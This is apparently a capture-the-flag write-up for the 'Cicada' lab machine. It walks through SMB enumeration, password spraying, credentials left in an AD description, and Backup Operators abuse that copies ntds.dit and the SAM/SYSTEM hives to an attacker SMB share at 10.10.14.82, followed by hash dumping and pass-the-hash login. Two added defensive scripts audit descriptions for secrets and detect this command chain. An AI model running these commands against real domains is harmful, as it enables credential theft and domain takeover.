Enumeration

As usual, we start off with an nmap scan to get a listing of open ports and running services:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 08:13:03Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp open  ldap
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

We get back a typical result for a Windows machine, including SMB, WinRM, some LDAP ports and even Kerberos. It's highly likely a Domain Controller for the cicada.htb domain.

SMB is the lowest-hanging fruit for enumerating some goodies, so we can use netexec to get a good look at the SMB shares, for example:

netexec smb $target -u 'anyone' -p '' --shares --smb-timeout 60

I had to add the SMB timeout because the box is not very performant and the requests would time out without it.

We get back the typical Windows shares plus a readable HR share. We can use smbclient to interact with the service and see what we can read:

smbclient //$target/HR -U 'anyone'
Password for [WORKGROUP\anyone]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 23:29:09 2024
  ..                                  D        0  Thu Mar 14 23:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 03:31:48 2024

		4168447 blocks of size 4096. 341446 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

Inside the notice text document, we can see some information about changing the default credentials for new employees. This is our likely attack path if we can enumerate some users on the machine.

The first thing to try is a rid-brute using the best Active Directory tool on the planet, netexec:

netexec smb $target -u 'anyone' -p '' --rid-brute --smb-timeout 60

This gives us a list of users we can test the default password against:

john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

We can then check who hasn’t changed their password, again with netexec:

netexec ldap $target -u users.lst -p '<redacted>' --continue-on-success

We see that the user michael.wrightson still has not changed the default password. He has read access to NETLOGON and SYSVOL file shares, so just a little bit more access than a normal user.

Using rpcclient with these new credentials allows us to find david.orelious's credentials.

rpcclient -U 'cicada.htb/michael.wrightson' $target
rpcclient $> querydispinfo

It seems he has been a bad boi admin and left his credentials in his account description, thinking it was safe there. David is an idiot.

david.orelious has access to the Dev share, where there is a .ps1 script called Backup_script. This script acts on behalf of the emily.oscars user by creating a PSCredential object. We can take the cleartext credential and see what emily.oscars has access to.

This user has access to the machine via WinRM:

evil-winrm -i $target -u 'emily.oscars' -p '<redacted>'
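A defensive counterpart to the finding above (a credential sitting in david.orelious's account description): an added audit script, not part of the write-up, that parses rpcclient querydispinfo output and flags descriptions that look like they carry a secret so they can be cleaned up before anyone else reads them. The sample output below is constructed, including the password-looking string.

```python
import re

# Constructed querydispinfo-style output; rpcclient separates the fields with tabs.
SAMPLE_OUTPUT = """\
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator\tName: (null)\tDesc: Built-in account for administering the computer/domain
index: 0xedb RID: 0x450 acb: 0x00000210 Account: john.smoulder\tName: John Smoulder\tDesc: (null)
index: 0xedc RID: 0x454 acb: 0x00000210 Account: david.orelious\tName: David Orelious\tDesc: Just in case I forget, my pwd is Welcome2024!
index: 0xedd RID: 0x455 acb: 0x00000210 Account: svc_sql\tName: (null)\tDesc: Service account for SQL, contact IT
"""

LINE_RE = re.compile(r"RID:\s*(0x[0-9a-f]+).*?Account:\s*(\S+)\tName:\s*(.*?)\tDesc:\s*(.*)$", re.I)
# words people use when they paste a credential into a free-text field
SECRET_HINT = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|pin|secret|token)\b", re.I)
# a token of 8+ chars mixing upper, lower and digits: the shape of a human-chosen password
PASSWORD_SHAPE = re.compile(r"(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)\S{8,}")

def parse(output):
    """Yield (rid, account, description), skipping empty or '(null)' descriptions."""
    for line in output.splitlines():
        m = LINE_RE.search(line)
        if m and m.group(4).strip() not in ("", "(null)"):
            yield m.group(1), m.group(2), m.group(4).strip()

def audit(output):
    """Return [(account, reasons)] for descriptions that look like they hold a credential."""
    findings = []
    for _rid, account, desc in parse(output):
        reasons = []
        if SECRET_HINT.search(desc):
            reasons.append("secret keyword")
        if PASSWORD_SHAPE.search(desc):
            reasons.append("password-shaped token")
        if reasons:
            findings.append((account, ", ".join(reasons)))
    return findings

if __name__ == "__main__":
    for account, reasons in audit(SAMPLE_OUTPUT):
        print(f"{account}: {reasons}")
```

The same two heuristics work unchanged on a Get-ADUser -Properties Description export if you swap the parser.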

Privilege Escalation

As the emily.oscars user, we can run whoami /all and see that we are a member of the Backup Operators group.

It’s really simple to get privilege escalation while being in this privileged group. Firstly, create a disk shadow script (backup.dsh):

set context persistent nowriters
add volume c: alias bak
create
expose %bak% z:

What this does is effectively mount a readable shadow copy of the C: drive as Z:. As a member of the Backup Operators group, we can run diskshadow.exe, which allows us to pass this file as a script. We need to be in a writable directory to do so.

Let's do this:

cd C:\
mkdir Temp
cd Temp
Invoke-WebRequest -Uri http://<your_ip>/backup.dsh -OutFile backup.dsh

Now we can run diskshadow to expose the shadow copy containing the file we want access to, ntds.dit. We run:

diskshadow.exe /s backup.dsh

Then, to copy the file to our working directory:

robocopy /B Z:\Windows\NTDS .\ntds ntds.dit

Next, we need two registry hives, SYSTEM and SAM:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save

Back on our attack host, we can stand up an SMB server to exfiltrate the files to.

mkdir smb && smbserver.py -smb2support share ./smb

On the target, we copy all the files back to our host:

copy sam.save \\10.10.14.82\share
copy system.save \\10.10.14.82\share
copy ./ntds/ntds.dit \\10.10.14.82\share

To extract all the secret goodies from the exfiltrated data, we use another brilliant impacket script, secretsdump.py:

secretsdump.py -sam sam.save -system system.save -ntds ntds.dit LOCAL

Using the NTLM hash gained for the Administrator user, we can then use WinRM to log back into the DC as Administrator, thereby fully compromising the host and the cicada.htb domain.

evil-winrm -i $target -u 'Administrator' -H '<redacted>'
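From the blue-team side, the Backup Operators chain above (scripted diskshadow, robocopy /B against NTDS, reg save of SAM/SYSTEM) leaves a recognisable footprint in process-creation telemetry. The following is an added detection example, not from the write-up, that classifies command lines into the stages of that chain and only alerts when one user hits two or more stages in a short window; the events are constructed, and the field shape (user, timestamp, command line) is an assumption about what a SIEM extracts from Security 4688 or Sysmon Event ID 1.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (user, timestamp, command line), shaped like the
# fields a SIEM extracts from Security 4688 / Sysmon Event ID 1. Not real telemetry.
SAMPLE_EVENTS = [
    ("CICADA\\emily.oscars", "2024-09-29 08:20:11", "diskshadow.exe /s backup.dsh"),
    ("CICADA\\emily.oscars", "2024-09-29 08:20:40", r"robocopy /B Z:\Windows\NTDS .\ntds ntds.dit"),
    ("CICADA\\emily.oscars", "2024-09-29 08:21:02", r"reg save HKLM\SYSTEM system.save"),
    ("CICADA\\emily.oscars", "2024-09-29 08:21:05", r"reg save HKLM\SAM sam.save"),
    # a legitimate nightly backup job: one stage only, must not alert on its own
    ("CICADA\\svc_backup", "2024-09-29 02:00:00", r'"C:\Windows\System32\diskshadow.exe" /s C:\Backups\nightly.dsh'),
    ("CICADA\\john.smoulder", "2024-09-29 08:25:00", r"robocopy C:\Users\john\Docs D:\Archive /E"),
]

HIVES = {r"hklm\sam", r"hklm\system", r"hklm\security"}

def classify(cmdline):
    """Map one command line to a stage of the chain, or None if it is not one."""
    tokens = cmdline.lower().replace('"', "").split()
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    if exe == "diskshadow" and "/s" in tokens:
        return "shadow_copy_from_script"   # scripted VSS snapshot, as with backup.dsh
    if exe == "robocopy" and "/b" in tokens and any("ntds" in t for t in tokens):
        return "ntds_copy_backup_mode"     # /B = backup mode, reads via SeBackupPrivilege
    if exe == "reg" and tokens[1:2] == ["save"] and tokens[2:3] and tokens[2] in HIVES:
        return "registry_hive_save"        # SYSTEM holds the boot key that unlocks NTDS secrets
    return None

def detect_chain(events, window=timedelta(minutes=30), min_stages=2):
    """Return {user: sorted stage names} for users hitting >= min_stages distinct
    stages inside `window`; a lone stage (scheduled backup) is left for low-severity review."""
    hits = {}
    for user, ts, cmd in events:
        stage = classify(cmd)
        if stage:
            hits.setdefault(user, []).append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), stage))
    alerts = {}
    for user, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            stages = {s for t, s in seen[i:] if t - start <= window}
            if len(stages) >= min_stages:
                alerts[user] = sorted(stages)
                break
    return alerts
```

Pair the process-creation rule with Security event 4672 (special privileges assigned, SeBackupPrivilege) to confirm the privilege was actually present in the session.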